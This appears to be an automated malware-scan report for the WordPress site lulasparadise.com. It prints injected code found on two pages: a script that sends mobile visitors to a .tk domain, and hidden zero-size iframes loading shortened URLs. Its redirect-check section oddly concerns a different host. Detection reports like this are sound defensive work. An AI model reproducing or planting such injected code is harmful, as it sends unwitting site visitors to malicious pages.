Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lulasparadise.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aw.smartenergymodel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Wed, 14 Jan 2015 21:39:28 GMT
Pragma: no-cache
Age: 0
Server: Microsoft-IIS/7.5
Content-Length: 8597
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...8597 bytes of data.
GET / HTTP/1.1
Host: aw.smartenergymodel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Wed, 14 Jan 2015 21:39:28 GMT
Pragma: no-cache
Age: 0
Server: Microsoft-IIS/7.5
Content-Length: 8597
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...8597 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aw.smartenergymodel.com
Referer: http://www.google.com/search?q=aw.smartenergymodel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aw.smartenergymodel.com
Referer: http://www.google.com/search?q=aw.smartenergymodel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://lulasparadise.com/ | 200 OK Content-Length: 40697 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://cort.as/o2ak <iframe src="http://cort.as/o2ak" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 0x0 src: http://is.gd/u9kpsg <iframe src="http://is.gd/u9kpsg" width="0" height="0" frameborder="0"> | ||
http://lulasparadise.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://lulasparadise.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://lulasparadise.com//maps.google.com/maps/api/js?sensor=false&ver=1/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 25 Feb 2015 02:17:27 GMT Pragma: no-cache Location: http://lulasparadise.com/maps.google.com/maps/api/js?sensor=false&ver=1/ Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://lulasparadise.com/xmlrpc.php X-Powered-By: PHP/5.4.37 | clean |
http://lulasparadise.com/maps.google.com/maps/api/js?sensor=false&ver=1/ | 404 Not Found Content-Length: 35843 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://is.gd/u9kpsg <iframe src="http://is.gd/u9kpsg" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 0x0 src: http://cort.as/o2ak <iframe src="http://cort.as/o2ak" width="0" height="0" frameborder="0"> | ||
http://lulasparadise.com/wp-content/plugins/cyclone-slider-2/libs/cycle2/jquery.cycle2.min.js?ver=2.9.7 | 200 OK Content-Length: 21665 Content-Type: application/javascript | clean |
http://lulasparadise.com/wp-content/plugins/cyclone-slider-2/libs/cycle2/jquery.cycle2.carousel.min.js?ver=2.9.7 | 200 OK Content-Length: 4254 Content-Type: application/javascript | clean |
http://lulasparadise.com/wp-content/plugins/cyclone-slider-2/libs/cycle2/jquery.cycle2.swipe.min.js?ver=2.9.7 | 200 OK Content-Length: 1323 Content-Type: application/javascript | clean |
http://lulasparadise.com/wp-content/plugins/cyclone-slider-2/libs/cycle2/jquery.cycle2.tile.min.js?ver=2.9.7 | 200 OK Content-Length: 1957 Content-Type: application/javascript | clean |
http://lulasparadise.com/wp-content/plugins/cyclone-slider-2/libs/cycle2/jquery.cycle2.video.min.js?ver=2.9.7 | 200 OK Content-Length: 1408 Content-Type: application/javascript | clean |
http://lulasparadise.com/wp-content/plugins/cyclone-slider-2/templates/dark/script.js?ver=2.9.7 | 200 OK Content-Length: 1085 Content-Type: application/javascript | clean |
http://lulasparadise.com/wp-content/plugins/cyclone-slider-2/templates/thumbnails/script.js?ver=2.9.7 | 200 OK Content-Length: 863 Content-Type: application/javascript | clean |
http://lulasparadise.com/wp-content/plugins/cyclone-slider-2/js/client.js?ver=2.9.7 | 200 OK Content-Length: 3779 Content-Type: application/javascript | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=1&beeline_land=37&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 25 Feb 2015 02:17:32 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=d5b2cb5c194984d27dccd77a527f6a13; path=/ X-Powered-By: PHP/5.3.29 | malicious |
http://cdn10.jump-wap.com/?sid=1783&land=26&type=js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://cdn10.jump-wap.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=76&beeline_land=28&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 25 Feb 2015 02:17:32 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=02b9496c018a1775172c44a3ba5281a2; path=/ X-Powered-By: PHP/5.3.29 | malicious |
http://lulasparadise.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.2 | 200 OK Content-Length: 3998 Content-Type: application/javascript | clean |